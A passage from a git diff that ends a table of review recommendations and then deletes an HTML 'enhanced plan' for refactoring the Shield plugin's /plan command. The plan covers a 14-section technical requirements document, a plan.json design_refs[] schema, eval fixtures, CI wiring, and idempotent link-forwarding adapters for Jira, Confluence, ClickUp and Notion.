| P0 | OP3 | Add an EPIC-1-S2 task: define the failure mode when /plan cannot determine domain (mixed *.tf + package.json). "Mixed → annotate per section" has no AC and no eval fixture. |
| P1 | OP6 | Add an explicit rollback-trigger statement to plan-architecture.md §Rollback: "Revert M1 if any of: (a) eval fails on positive fixtures after merge, (b) >N user-reported broken /plan runs within 48 hours, (c) downstream /pm-sync adapter errors trace back to schema 1.2." |
| P1 | OP6 | Add a task to bump marketplace version in .claude-plugin/marketplace.json and pyproject.toml per CLAUDE.md "When updating any plugin, bump its version in both…in the same commit". |
| P1 | OP7 | Add an AC under EPIC-1-S2 to emit a provenance comment (e.g., <!-- generated by /plan vX.Y.Z on YYYY-MM-DD -->) at the top of trd.md. |
| P1 | OP3 | Add a failure-mode AC: "If /plan cannot write trd.md (disk error, partial write, missing template), it must not leave a corrupted file behind; write atomically (temp file + rename) or fail loudly with the partial file removed." |
| P2 | OP1 | Consider a lightweight --dry-run or --validate-only mode for /plan so users can verify a TRD passes the eval locally before committing. |
| P2 | OP7 | Add a one-page troubleshooting block to shield/commands/plan.md listing the top 3 failure modes and recovery steps. |
| P2 | OP3 | Add an eval fixture for the M2 backward-compat scenario: /plan-review running against a pre-M1 plan-architecture.md-only folder. |
- - - diff --git a/docs/shield/plan-trd-refactor-20260524/outputs/reviews/plan/2026-05-25/enhanced-plan.html b/docs/shield/plan-trd-refactor-20260524/outputs/reviews/plan/2026-05-25/enhanced-plan.html deleted file mode 100644 index 164d8179..00000000 --- a/docs/shield/plan-trd-refactor-20260524/outputs/reviews/plan/2026-05-25/enhanced-plan.html +++ /dev/null @@ -1,396 +0,0 @@ - - - - -Plan Review — /plan TRD refactor - - - -

Plan (Enhanced) — /plan TRD refactor

-

Feature: plan-trd-refactor-20260524 · Phase: v1 cutover · Source: ../../../research.md · ../../../plan-architecture.md
Sidecar: ../../../plan.json (schema v1.1)
Review applied: summary.md (composite B; 6 P0 + 15 P1 + 18 P2 recommendations)

-

What changed vs original plan.md

-

Six P0 fixes and the most consequential P1s have been folded in. Specifically:

-
    -
  • P0-1 fixed: "13" purged from all artifacts; EPIC-3-S3 AC now correctly references 16 negatives (14 missing-section + 1 drift + 1 vague-TBD)
  • -
  • P0-2 fixed: new EPIC-4-S0 added — adapter package scaffolding (Jira/Confluence/Notion don't exist as uv packages today; only ClickUp does). EPIC-4-S3 now consumes that scaffolding rather than implying it
  • -
  • P0-3 fixed: EPIC-4-S3 now specifies the forward_design_refs(task_id, refs) → ForwardResult contract and the globalId = sha256(story_id + anchor_url)[:32] idempotency key
  • -
  • P0-4 fixed: new AC in EPIC-4-S3 — "Running /pm-sync twice in succession produces the same remote state"
  • -
  • P0-5 fixed: EPIC-3-S3 renamed to "Wire eval into recurring CI + RED→GREEN paper trail" with an explicit .github/workflows/ task
  • -
  • P0-6 fixed: EPIC-1-S2 now defines "Mixed → annotate per section" with a worked example; EPIC-3-S1 adds positive-mixed/ fixture
  • -
-

P1s addressed inline:

-
    -
  • EPIC-2-S2 section_id heuristic (P1-1) and merge semantics (P1-2) now concretely specified
  • -
  • EPIC-4-S3 adapter file paths (P1-3) enumerated
  • -
  • EPIC-1-S2 reconciled — domain detection consults repo markers only; .shield.json plan.template_override is the override key (P1-5)
  • -
  • EPIC-4-S1 gets a stale-anchor detection rule (P1-6)
  • -
  • New EPIC-2-S3: JSON Schema validator (P1-7)
  • -
  • EPIC-4-S3 observability shape spelled out — action='forward_design_ref' with structured fields (P1-8)
  • -
  • EPIC-1-S2 keeps plan_arch_md/plan_arch_html keys marked deprecated: true (P1-9)
  • -
  • EPIC-1-S2 gets a provenance-stamp AC (P1-10)
  • -
  • New EPIC-1-S4: version bumps in marketplace.json + pyproject.toml (P1-12)
  • -
  • EPIC-4-S3 gets a tool-and-access requirements subsection naming test tenants + credential storage (P1-13)
  • -
  • EPIC-1-S2 gets an atomic-write AC (P1-14)
  • -
  • sidecar-schema.md gets a forward-compat policy paragraph (P1-15)
  • -
-

Deferred to a follow-up review pass: rollback-trigger language in plan-architecture.md (P1-11; needs a prose addition, not a story change), plus these P2s: trd_sha content hash, template_version field, round-trip integration eval, --dry-run mode, troubleshooting page, magic-number defenses. See summary.md §P2 for the full list.

-
-

Milestones

| ID | Name | Outcome | Depends on |
|---|---|---|---|
| M1 | TRD cutover | /plan emits trd.md (14 sections, stable anchors, domain-aware prompting for backend/infra, atomic write, provenance stamp); plan.json carries optional design_refs[]; schema validator wired; eval coverage for both domains plus mixed; recurring CI gate in place. | |
| M2 | Review + sync wiring | /plan-review grades against 14-section rubric (with n/a — <reason> escape) + duplication rule + stale-anchor rule; /pm-sync adapters forward design_refs[] as web links with idempotent upsert. | M1 |
| M3 | Drift + duplication hardening | last_aligned_with metadata + implementation-manual lint rule. | M2 |
-
-

EPIC-1 · TRD generation and storage · M1

-

EPIC-1-S1 · Author the canonical 14-section TRD template with domain-aware prompting · priority: high

-

(unchanged from plan.md — see plan.md EPIC-1-S1)

-

EPIC-1-S2 · Update /plan to emit trd.md (unified backend + infra) · priority: high

-

Modify shield/commands/plan.md and shield/skills/general/plan-docs/SKILL.md so /plan writes trd.md with all 14 sections for both backend and infrastructure features. Stop emitting plan-architecture.md. Direct cutover: no feature flag, no side-by-side period. The generation prompt detects the dominant domain from repo markers (with .shield.json plan.template_override as the manual override key) and surfaces the right per-section authoring guidance.

-

Tasks

-
    -
  • Replace 'Generate plan-architecture.md' with 'Generate trd.md per the unified 14-section template'.
  • -
  • Update plan-docs/SKILL.md generation prompt to walk 14 sections, select domain-appropriate authoring guidance, emit explicit {#section-id} anchors.
  • -
  • Domain detection (P1-5): reuse existing repo-marker detection (*.tf / atmos.yaml / Chart.yaml → infra; pom.xml / pyproject.toml / package.json / go.mod → backend). For manual override, read .shield.json plan.template_override{infra, backend, mixed}. Document this in shield/commands/plan.md.
  • -
  • Mixed-domain handling (P0-6): when both infra and backend markers are detected (or plan.template_override == "mixed"), the generator prepends [backend] and [infra] labels to subsection bullets within each section that has divergent interpretations. Worked example: §11 APIs Involved emits a ### [backend] HTTP API contracts subsection AND a ### [infra] Module interfaces & cloud-API surface subsection. A positive-mixed/ eval fixture in EPIC-3-S1 demonstrates the shape.
  • -
  • Output-paths deprecation overlap (P1-9): add plan_trd_md ({output_dir}/{feature}/trd.md) and plan_trd_html ({output_dir}/{feature}/outputs/trd.html) to shield/schema/output-paths.yaml. Keep plan_arch_md and plan_arch_html with deprecated: true in the entry; remove in M3 or a follow-up PR. Mirror in shield/commands/plan.md outputs: frontmatter.
  • -
  • Update render-markdown helper invocation to render trd.md to outputs/trd.html.
  • -
  • Provenance stamp (P1-10): the generator emits a top-of-file HTML comment in trd.md: <!-- generated by /plan v{plugin-version} on {YYYY-MM-DD} --> where {plugin-version} is read from .claude-plugin/marketplace.json.
  • -
  • Atomic write (P1-14): the generator writes trd.md.tmp first, then renames to trd.md. If any step fails (template-load error, prompt error, write error), it removes trd.md.tmp and surfaces the error message — never leaves a partial trd.md behind.
  • -
-
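The domain-detection task above can be sketched roughly as follows. This is a minimal illustration, not Shield's actual detector: the function names, the recursive scan, the `"unknown"` result for a repo with no markers, and the assumption that `plan.template_override` is nested under a `plan` object in `.shield.json` are all hypothetical.

```python
import json
from pathlib import Path

# Marker lists are taken from the task text above.
INFRA_MARKERS = ("*.tf", "atmos.yaml", "Chart.yaml")
BACKEND_MARKERS = ("pom.xml", "pyproject.toml", "package.json", "go.mod")
VALID_OVERRIDES = {"infra", "backend", "mixed"}


def _has_marker(root, patterns):
    """True if any file under root matches one of the glob patterns."""
    return any(next(root.rglob(p), None) is not None for p in patterns)


def read_override(root):
    """Read plan.template_override from .shield.json (assumed nesting)."""
    cfg = Path(root) / ".shield.json"
    if not cfg.is_file():
        return None
    data = json.loads(cfg.read_text(encoding="utf-8"))
    return data.get("plan", {}).get("template_override")


def detect_domain(root, override=None):
    """Return 'infra', 'backend', 'mixed', or 'unknown' (hypothetical value)."""
    if override is not None:
        if override not in VALID_OVERRIDES:
            raise ValueError(f"invalid template_override: {override!r}")
        return override  # a manual override wins over repo markers
    root = Path(root)
    infra = _has_marker(root, INFRA_MARKERS)
    backend = _has_marker(root, BACKEND_MARKERS)
    if infra and backend:
        return "mixed"
    if infra:
        return "infra"
    if backend:
        return "backend"
    return "unknown"
```

A caller would typically combine the two: `detect_domain(repo, override=read_override(repo))`.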

Acceptance criteria

-
    -
  • Running /plan in a fresh feature folder writes trd.md and outputs/trd.html.
  • -
  • /plan no longer writes plan-architecture.md anywhere.
  • -
  • output-paths.yaml lists plan_trd_md and plan_trd_html; plan_arch_md and plan_arch_html are marked deprecated: true.
  • -
  • Running /plan on a folder with only infra markers produces a TRD where infra interpretation dominates §4–7, §11, §14.
  • -
  • Running /plan on a folder with only backend markers produces a TRD where backend interpretation dominates the same sections.
  • -
  • (P0-6) Running /plan on a folder with both infra and backend markers produces a TRD where divergent sections carry [backend] and [infra] labeled subsections.
  • -
  • (P1-5) Setting .shield.json plan.template_override to one of {infra, backend, mixed} overrides repo-marker detection.
  • -
  • (P1-10) Emitted trd.md carries a <!-- generated by /plan vX.Y.Z on YYYY-MM-DD --> comment as the first line after frontmatter.
  • -
  • (P1-14) Killing /plan mid-write (e.g., SIGTERM during generation) does not leave a corrupted trd.md; only trd.md.tmp may remain and is removed on next invocation.
  • -
-
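The atomic-write criterion (P1-14) could be met along these lines. This is a sketch under assumptions: the helper name is hypothetical, and it assumes `trd.md.tmp` lives next to `trd.md` so the rename stays on one filesystem.

```python
import os
from pathlib import Path


def write_trd_atomically(target_dir, content):
    """Write trd.md via a temp file plus rename so readers never see a partial file."""
    target = Path(target_dir) / "trd.md"
    tmp = target.with_name("trd.md.tmp")
    # Clear a stale temp file left behind by an interrupted earlier run.
    tmp.unlink(missing_ok=True)
    try:
        with open(tmp, "w", encoding="utf-8") as fh:
            fh.write(content)
            fh.flush()
            os.fsync(fh.fileno())  # push bytes to disk before the rename
        os.replace(tmp, target)  # atomic when both paths share a filesystem
    except BaseException:
        # On any failure, remove the temp file and surface the original error.
        tmp.unlink(missing_ok=True)
        raise
    return target
```

If the write fails partway, an existing `trd.md` is left untouched because only the temp file was ever opened for writing.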

EPIC-1-S3 · Update existing-feature behavior on re-run · priority: medium

-

(unchanged from plan.md)

-

EPIC-1-S4 · Bump plugin version per CLAUDE.md mandate · priority: high (new — P1-12)

-

CLAUDE.md "Plugin isolation / Versioning" requires bumping .claude-plugin/marketplace.json and pyproject.toml in the same commit as any plugin update. The TRD refactor is silent on this; add the bump here.

-

Tasks

-
    -
  • Bump .claude-plugin/marketplace.json version field for the Shield plugin entry.
  • -
  • Bump pyproject.toml version in any package modified (shield/adapters/clickup/pyproject.toml, plus new adapter packages from EPIC-4-S0).
  • -
  • Update Shield's user-facing CHANGELOG (or create one if absent) noting the cutover from plan-architecture.md to trd.md.
  • -
-

Acceptance criteria

-
    -
  • The M1 PR includes both version bumps in the same commit as the SKILL.md changes.
  • -
  • CHANGELOG mentions the cutover and the schema 1.1 → 1.2 bump.
  • -
-
-

EPIC-2 · Story schema and design traceability · M1

-

EPIC-2-S1 · Extend plan.json schema with optional design_refs[] · priority: high

-

Add an optional design_refs[] array to each story in the plan.json sidecar. Shape: {doc, component?, section_id, anchor_url, label}. Bump sidecar schema to 1.2; preserve back-compat.

-

Tasks

-
    -
  • Edit sidecar-schema.md to add design_refs[] field on the story record.
  • -
  • Bump version key in schema example from '1.1' to '1.2'.
  • -
  • Document back-compat: 1.1/1.0 sidecars without design_refs[] remain valid.
  • -
  • (P1-15) Add a forward-compat policy subsection to sidecar-schema.md: when /plan-review encounters version > current, it warns but does not reject; unknown top-level keys are preserved on round-trip; unknown doc enum values fail validation.
  • -
  • Add a 'design_refs[] field' subsection with per-field semantics (doc ∈ {trd, lld, prd}; component for LLD scoping; anchor_url stable across heading renames).
  • -
  • (P2-6) Add an inline example design_refs[] JSON instance (one TRD ref + one LLD placeholder).
  • -
-

Acceptance criteria

-
    -
  • sidecar-schema.md documents design_refs[] with version 1.2 and a forward-compat policy.
  • -
  • A plan.json with no design_refs[] still validates as 1.2.
  • -
  • A plan.json with design_refs[] populated validates as 1.2.
  • -
  • An inline example is present in the schema doc.
  • -
-
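For orientation, one possible `design_refs[]` instance with a TRD ref and an LLD placeholder is shown below as a Python literal serialized to JSON. The story `id` key, the label wording for the TRD ref, and the `null` `section_id` on the LLD placeholder are assumptions; the field names and the LLD placeholder values for `component`, `anchor_url`, and `label` follow the plan text.

```python
import json

# Hypothetical story record; only the design_refs field names come from the plan.
story = {
    "id": "EPIC-2-S1",
    "design_refs": [
        {
            "doc": "trd",
            "component": None,
            "section_id": "high-level-design",
            "anchor_url": "trd.md#high-level-design",
            "label": "TRD section 7: high-level design",
        },
        {
            "doc": "lld",
            "component": None,
            "section_id": None,  # assumed: no section exists until the LLD lands
            "anchor_url": None,
            "label": "TODO: link when /lld <component> lands",
        },
    ],
}

print(json.dumps(story, indent=2))
```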

EPIC-2-S2 · Populate design_refs[] when /plan has TRD context · priority: high

-

When /plan generates stories, populate each story's design_refs[] with a forward link to the TRD section it implements.

-

Tasks

-
    -
  • Update generation prompt: for each story, emit at least one design_refs entry pointing at a real trd.md#{section-id} anchor.
  • -
  • (P1-1) Section-ID selection heuristic: lowercase the story's name, tokenize on whitespace and punctuation, score each TRD section anchor slug by Jaccard similarity between the story-name token set and the slug token set (overlap size divided by union size), and pick the highest-scoring slug. Tie-break by section order (lower § number wins). If no token overlaps with any slug, fall back to §7 high-level-design.
  • -
  • For LLD references, emit placeholders with doc='lld', component=null, anchor_url=null, label='TODO: link when /lld <component> lands'.
  • -
  • (P1-2) Re-run merge semantics: on /plan re-run, match existing design_refs[] entries by (doc, section_id, component) tuple. If found: replace label and anchor_url if changed, never duplicate. If a stored entry no longer has a matching TRD section (anchor deleted), preserve it but mark stale: true. New refs append.
  • -
-
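The section-ID heuristic (P1-1) can be sketched as below, scoring by Jaccard similarity over token sets. The function names are hypothetical, and the slug list in the usage note is illustrative rather than the real 14-entry allow-list.

```python
import re

FALLBACK_SLUG = "high-level-design"  # the plan's fallback section


def tokenize(text):
    """Lowercase and split on anything that is not a letter or digit."""
    return {tok for tok in re.split(r"[^a-z0-9]+", text.lower()) if tok}


def pick_section_id(story_name, ordered_slugs):
    """Pick the slug with the highest Jaccard score; earlier sections win ties."""
    story_tokens = tokenize(story_name)
    best_slug, best_score = None, 0.0
    for slug in ordered_slugs:  # assumed to be in TRD section order
        slug_tokens = tokenize(slug)
        union = story_tokens | slug_tokens
        score = len(story_tokens & slug_tokens) / len(union) if union else 0.0
        if score > best_score:  # strict '>' keeps the lower section number on ties
            best_slug, best_score = slug, score
    return best_slug if best_slug is not None else FALLBACK_SLUG
```

With a hypothetical slug list `["overview", "high-level-design", "apis-involved", "rollout-plan"]`, the name "Define rollout plan for cutover" selects `rollout-plan`. Plain token matching does no stemming, so `users` in a story name does not match a `user` token in a slug; a name like "Implement POST /users endpoint" would fall back unless the real implementation normalizes plurals.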

Acceptance criteria

-
    -
  • A /plan run on a feature with trd.md emits at least one design_refs entry per story.
  • -
  • Each story has at least one TRD design_ref; LLD refs are TODO placeholders.
  • -
  • (P1-1) Story name "Implement POST /users endpoint" resolves to section_id: "api-create-user" if that anchor exists, else high-level-design.
  • -
  • (P1-2) Running /plan twice on the same plan does not duplicate design_refs[] entries — verified by an eval fixture.
  • -
  • (P1-2) Deleting a TRD section between /plan runs results in the matching design_refs[] entry being marked stale: true (rather than removed).
  • -
-
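The re-run merge semantics (P1-2) might look like the sketch below. It assumes refs are plain dicts and that the caller supplies the set of section IDs currently present in trd.md; the function name is hypothetical, and restricting the stale check to `doc == "trd"` entries is an interpretation of the plan text.

```python
def merge_design_refs(existing, generated, live_section_ids):
    """Merge freshly generated refs into stored ones without duplicating entries."""

    def key(ref):
        # Match entries on the (doc, section_id, component) tuple from the plan.
        return (ref.get("doc"), ref.get("section_id"), ref.get("component"))

    merged = [dict(ref) for ref in existing]  # copy so inputs are not mutated
    index = {key(ref): ref for ref in merged}
    for ref in generated:
        current = index.get(key(ref))
        if current is None:
            new_ref = dict(ref)
            merged.append(new_ref)  # new refs append
            index[key(new_ref)] = new_ref
        else:
            # Matching entry: refresh label and anchor_url in place.
            current["label"] = ref.get("label")
            current["anchor_url"] = ref.get("anchor_url")
    for ref in merged:
        # Stored TRD refs whose section has disappeared are kept but flagged.
        if ref.get("doc") == "trd" and ref.get("section_id") not in live_section_ids:
            ref["stale"] = True
    return merged
```

Running the merge a second time with the same inputs returns the same list, which is the property the no-duplicates eval fixture would check.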

EPIC-2-S3 · Add JSON Schema validator for plan.json · priority: high (new — P1-7)

-

Two version bumps (1.1 → 1.2 → 1.3) without a machine-readable validator is the point at which schema drift sets in. Add it now.

-

Tasks

-
    -
  • Create shield/scripts/validate_plan.py using pydantic (preferred — already in the deps tree via clickup adapter) or jsonschema.
  • -
  • Schema definition lives at shield/schema/plan-sidecar.schema.json (machine-readable counterpart to sidecar-schema.md).
  • -
  • Validator is invoked by /plan-review (first check) and the eval runner (in EPIC-3).
  • -
  • Reject unknown doc enum values, enforce design_refs[] cardinality (min 1 per story when populated), and warn on (rather than reject) sidecar versions newer than current, per the forward-compat policy in sidecar-schema.md.
  • -
-

Acceptance criteria

-
    -
  • uv run shield/scripts/validate_plan.py <path> exits 0 on valid sidecars and non-zero with a named error on invalid ones.
  • -
  • /plan-review invokes the validator before applying rubric checks and aborts on schema failure.
  • -
  • Sidecar version forward-compat behavior matches the policy in sidecar-schema.md (warn on > current, accept-with-ignored-unknown-keys).
  • -
-
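As a rough illustration of two of the validator checks, the sketch below uses only the standard library rather than pydantic or jsonschema, which the story prefers. The flat `{"version", "stories"}` sidecar layout, the story `id` key, and the error and warning strings are assumptions; the `doc` enum and the warn-on-newer-version behavior follow the forward-compat policy described for sidecar-schema.md.

```python
CURRENT_VERSION = (1, 2)
ALLOWED_DOCS = {"trd", "lld", "prd"}


def parse_version(raw):
    """Turn '1.2' into (1, 2); return None when the value is not dotted integers."""
    try:
        return tuple(int(part) for part in str(raw).split("."))
    except ValueError:
        return None


def validate_sidecar(sidecar):
    """Return (errors, warnings) for a plan.json-like dict (assumed layout)."""
    errors, warnings = [], []
    version = parse_version(sidecar.get("version"))
    if version is None:
        errors.append("invalid-version")
    elif version > CURRENT_VERSION:
        warnings.append("newer-version")  # policy: warn, do not reject
    for story in sidecar.get("stories", []):
        # design_refs[] is optional, so a missing key is valid.
        for ref in story.get("design_refs") or []:
            if ref.get("doc") not in ALLOWED_DOCS:
                errors.append(f"unknown-doc-value:{story.get('id')}:{ref.get('doc')}")
    return errors, warnings
```

A command-line wrapper would exit non-zero whenever `errors` is non-empty and print `warnings` without failing.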
-

EPIC-3 · Eval coverage for TRD format · M1

-

EPIC-3-S1 · Author positive TRD eval fixtures (backend + infra + mixed) · priority: high

-

Create three positive fixture trd.md files: backend, infra, and mixed (P0-6). The infra fixture uses n/a — <reason> on at least one section; the mixed fixture uses [backend]/[infra] labeled subsections on at least §11 APIs Involved.

-

Tasks

-
    -
  • Author shield/evals/plan-trd/fixtures/positive-backend/trd.md with all 14 sections (Bytebite-style fictional feature).
  • -
  • Author shield/evals/plan-trd/fixtures/positive-infra/trd.md with all 14 sections (fictional terraform/atmos change). At least one section uses n/a — <reason>.
  • -
  • (P0-6) Author shield/evals/plan-trd/fixtures/positive-mixed/trd.md with all 14 sections for a fictional feature that has both backend code and an infra component (e.g., a new internal microservice with its own RDS instance). §11 APIs Involved demonstrates the [backend] / [infra] labeled-subsection shape.
  • -
  • Author corresponding plan.json sidecars with design_refs[] entries pointing at fixture trd.md anchors.
  • -
  • Write shield/evals/plan-trd.yaml with all three positive cases wired.
  • -
-

Acceptance criteria

-
    -
  • All three positive fixtures pass the eval.
  • -
  • The infra fixture uses n/a — <reason> on at least one section.
  • -
  • The mixed fixture uses labeled subsections on at least §11.
  • -
  • Fixtures are self-contained (no external API calls, no LLM dispatches).
  • -
-

EPIC-3-S2 · Author missing-section + drift + vague-TBD negative fixtures · priority: high

-

(P0-1, P0-4) For each of the 14 required sections, author a fixture that omits it. Add one drift-by-addition fixture (15th section). Add one vague-TBD fixture. Total: 16 negative fixtures.

-

Tasks

-
    -
  • 14 missing-section fixtures under shield/evals/plan-trd/fixtures/missing-{section-id}/trd.md.
  • -
  • 1 drift-by-addition fixture under shield/evals/plan-trd/fixtures/extra-section/trd.md.
  • -
  • 1 vague-TBD fixture under shield/evals/plan-trd/fixtures/vague-tbd/trd.md (§6 NFRs contains only 'TBD').
  • -
  • Wire each into shield/evals/plan-trd.yaml with named expected_error.
  • -
-

Acceptance criteria

-
    -
  • 16 negative fixtures total exist and fail with the expected named errors.
  • -
  • Drift fixture fails with 'unexpected section'; vague-TBD fails with 'vague section content'; missing-section fixtures fail with their section's slug in the error message.
  • -
-

EPIC-3-S3 · Wire eval into recurring CI + RED-GREEN paper trail · priority: high (P0-5, P1-4 — renamed)

-

Wire shield/evals/plan-trd.yaml into a recurring CI job, not just one-shot PR-body capture. Capture RED→GREEN trail in the implementation PR.

-

Tasks

-
    -
  • (P0-5) Create or extend .github/workflows/eval-plan-trd.yml (or wire into the existing eval workflow if one exists) that runs uv run shield/evals/run.py plan-trd on every PR touching shield/skills/general/plan-docs/**, shield/schema/**, or shield/evals/plan-trd/**.
  • -
  • Before any /plan command changes: run the eval and confirm RED.
  • -
  • After /plan changes land: run the eval and confirm GREEN (3 positives pass; 16 negatives fail with the right named errors).
  • -
  • Capture both runs in the implementation PR description.
  • -
-

Acceptance criteria

-
    -
  • A GitHub Actions workflow exists that runs the eval on PRs touching the relevant paths.
  • -
  • The workflow fails the build if the eval reports any fixture mismatch.
  • -
  • PR body for the M1 cutover contains both RED and GREEN sections, showing 3 positives + 16 negatives behaving as expected before and after.
  • -
  • The eval invocation is consistently uv run shield/evals/run.py plan-trd (no "or equivalent" hedge).
  • -
-
-

EPIC-4 · /plan-review and /pm-sync wiring · M2

-

EPIC-4-S0 · Scaffold Jira / Confluence / Notion adapter packages · priority: high (new — P0-2)

-

Only shield/adapters/clickup/ exists today as a uv package. EPIC-4-S3 implies four adapters land in one story but three of them have no pyproject.toml, no tests/, no MCP server skeleton. Scaffold them first.

-

Tasks

-
    -
  • Create shield/adapters/jira/ with pyproject.toml declaring requests (or atlassian-python-api) as a dep, server/ skeleton mirroring clickup's layout, tests/ directory with a placeholder contract test, and .mcp.json entry.
  • -
  • Same for shield/adapters/confluence/.
  • -
  • Same for shield/adapters/notion/.
  • -
  • Create shield/adapters/_common/design_refs.py exposing the DesignRef dataclass and the forward_design_refs protocol interface (see EPIC-4-S3 for shape).
  • -
  • Update top-level pyproject if needed to add the new packages to the workspace.
  • -
-

Acceptance criteria

-
    -
  • Each new adapter directory has a working pyproject.toml resolvable by uv sync.
  • -
  • Each new adapter has a placeholder contract test that runs (and may be skipped) under uv run pytest shield/adapters/<tool>/tests/.
  • -
  • shield/adapters/_common/design_refs.py exports DesignRef, ForwardResult, ForwardError, and a protocol/abstract class for forward_design_refs.
  • -
  • .mcp.json entries for the new adapters are present (even if disabled until EPIC-4-S3 lands the real logic).
  • -
-

EPIC-4-S1 · Add 14-section presence rule + stale-anchor rule to /plan-review · priority: high (P1-6 added)

-

Extend /plan-review rubric to check 14 required sections, the n/a — <reason> escape, and stale design_refs[] anchors.

-

Tasks

-
    -
  • TRD section presence rule (imports 14-entry slug allow-list; checks each anchor exists).
  • -
  • TRD section content rule (accepts real content or n/a — <reason>; flags 'TBD'/empty).
  • -
  • (P1-6) Stale-anchor rule: for each story's design_refs[].anchor_url, parse the #section-id and assert it exists in the linked trd.md. Report mismatches as Critical findings.
  • -
  • Eval fixtures under shield/evals/plan-review-trd/ exercising all three rules.
  • -
-
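The stale-anchor rule (P1-6) could be approximated as follows. The sketch assumes anchors appear in trd.md as explicit `{#section-id}` markers, as the generator task in EPIC-1-S2 describes; the function name, the finding dict shape, and the story `id` key are hypothetical.

```python
import re
from urllib.parse import urlparse

# Explicit heading anchors of the form {#section-id}.
ANCHOR_RE = re.compile(r"\{#([A-Za-z0-9_-]+)\}")


def find_stale_anchors(trd_markdown, stories):
    """Report TRD design_refs whose #fragment has no matching anchor in trd.md."""
    known = set(ANCHOR_RE.findall(trd_markdown))
    findings = []
    for story in stories:
        for ref in story.get("design_refs", []):
            url = ref.get("anchor_url")
            if ref.get("doc") != "trd" or not url:
                continue  # LLD placeholders carry no anchor to check
            fragment = urlparse(url).fragment
            if fragment not in known:
                findings.append(
                    {
                        "severity": "Critical",
                        "story_id": story.get("id"),
                        "anchor": fragment,
                    }
                )
    return findings
```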

Acceptance criteria

-
    -
  • /plan-review flags missing sections by slug as Critical.
  • -
  • /plan-review does not flag presence/content for valid TRDs (including n/a — <reason>).
  • -
  • TBD-only sections flag as vague-content Critical.
  • -
  • n/a without reason flags as missing-reason.
  • -
  • (P1-6) A plan.json whose story design_refs[].anchor_url points at a non-existent anchor in trd.md flags as Critical with the offending anchor in the message.
  • -
-
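The content rule's three outcomes (valid, vague-content, missing-reason) can be sketched with a small classifier. The return strings and the exact accepted form of the escape (`n/a` followed by an em dash and a reason, as written in the plan) are assumptions about how the rule would be spelled out.

```python
import re

# Matches "n/a" alone or "n/a — <reason>" on a single line.
NA_PATTERN = re.compile(r"^n/a\s*(?:—\s*(?P<reason>.*))?$", re.IGNORECASE)


def classify_section_body(body):
    """Classify a TRD section body as 'ok', 'vague-content', or 'missing-reason'."""
    text = body.strip()
    if not text or text.upper() == "TBD":
        return "vague-content"  # empty or TBD-only sections are flagged
    match = NA_PATTERN.match(text)
    if match:
        reason = (match.group("reason") or "").strip()
        return "ok" if reason else "missing-reason"
    return "ok"  # anything else counts as real content
```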

EPIC-4-S2 · Add PRD↔TRD duplication-detection rule to /plan-review · priority: medium

-

(unchanged from plan.md)

- -

Update /pm-sync adapters to forward each story's design_refs[] entries as web links on the synced task. Use a deterministic idempotency key to prevent duplicates on re-run.

-

Adapter file paths (P1-3):

-
    -
  • shield/adapters/clickup/server/tools/sync.py — extend existing
  • -
  • shield/adapters/jira/server/tools/sync.py — new (per EPIC-4-S0)
  • -
  • shield/adapters/confluence/server/tools/sync.py — new
  • -
  • shield/adapters/notion/server/tools/sync.py — new
  • -
-

Adapter interface contract (P0-3):
Each adapter exposes:

-
def forward_design_refs(task_id: str, refs: list[DesignRef]) -> ForwardResult: ...
-
-

where ForwardResult is {created: int, skipped: int, errors: list[ForwardError]}. DesignRef and ForwardResult are defined in shield/adapters/_common/design_refs.py (from EPIC-4-S0).
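One way the shared types in shield/adapters/_common/design_refs.py might be laid out is sketched below. The `DesignRef` fields mirror the `design_refs[]` shape from EPIC-2-S1 and `ForwardResult` mirrors the contract above; the `ForwardError` fields and the protocol class name are assumptions borrowed from the failure-log fields, not a confirmed design.

```python
from dataclasses import dataclass, field
from typing import Optional, Protocol


@dataclass(frozen=True)
class DesignRef:
    doc: str                      # one of: trd, lld, prd
    section_id: Optional[str]
    anchor_url: Optional[str]     # None for LLD placeholders
    label: str
    component: Optional[str] = None


@dataclass
class ForwardError:
    # Hypothetical fields, modelled on the failure log entry.
    idempotency_key: str
    error_class: str
    http_status: Optional[int] = None


@dataclass
class ForwardResult:
    created: int = 0
    skipped: int = 0
    errors: list[ForwardError] = field(default_factory=list)


class DesignRefForwarder(Protocol):
    """Structural interface each adapter would satisfy (name is hypothetical)."""

    def forward_design_refs(self, task_id: str, refs: list[DesignRef]) -> ForwardResult:
        ...
```

Using a `Protocol` means adapters need not inherit from a common base class; any object with a matching `forward_design_refs` method type-checks against it.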

-

Idempotency key: each DesignRef produces idempotency_key = sha256(story_id + anchor_url)[:32]. Adapters use this as:

-
    -
  • Jira: the globalId field on remote_issue_link
  • -
  • Confluence: the name field on remote_link
  • -
  • ClickUp: the comparison key for URL custom field deduplication before write
  • -
  • Notion: the comparison key for URL property deduplication before write
  • -
-

Observability (P1-8): each forwarded ref emits one action_log entry with action='forward_design_ref', fields {story_id, adapter, anchor_url, outcome, idempotency_key}. Failures emit action='forward_design_ref_failed' with {error_class, http_status, idempotency_key}.
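The two log shapes described above could be built by helpers like these. The helper names and the example `outcome` values are hypothetical; the `action` strings and field names come from the observability text.

```python
import json


def success_entry(story_id, adapter, anchor_url, outcome, idempotency_key):
    """Build the per-ref action_log entry for a forwarded design ref."""
    return {
        "action": "forward_design_ref",
        "story_id": story_id,
        "adapter": adapter,
        "anchor_url": anchor_url,
        "outcome": outcome,  # e.g. "created" or "skipped" (assumed values)
        "idempotency_key": idempotency_key,
    }


def failure_entry(error_class, http_status, idempotency_key):
    """Build the action_log entry emitted when forwarding a ref fails."""
    return {
        "action": "forward_design_ref_failed",
        "error_class": error_class,
        "http_status": http_status,
        "idempotency_key": idempotency_key,
    }


def to_log_line(entry):
    """Serialize an entry as one JSON line with stable key order."""
    return json.dumps(entry, sort_keys=True)
```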

-

Tool & access requirements (P1-13):

-
    -
  • Test tenants: each adapter integration test uses a free-tier sandbox tenant (Confluence Cloud free tier, Jira Cloud free tier, ClickUp free workspace, Notion free workspace) OR uses HTTP mocking via responses library (preferred — credential-free CI).
  • Credentials in tests: when integration tests run live, credentials come from SHIELD_<ADAPTER>_TOKEN env vars; CI defaults to mocked mode.
  • Python deps: Jira → requests; Confluence → requests; ClickUp → existing httpx; Notion → requests. All declared in each adapter's pyproject.toml.
-

Idempotency test (P0-4):

-
    -
  • Eval fixture under shield/adapters/<tool>/tests/test_idempotency.py that runs forward_design_refs twice with the same input against a mocked remote and asserts the second call produces 0 created and N skipped.
-
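
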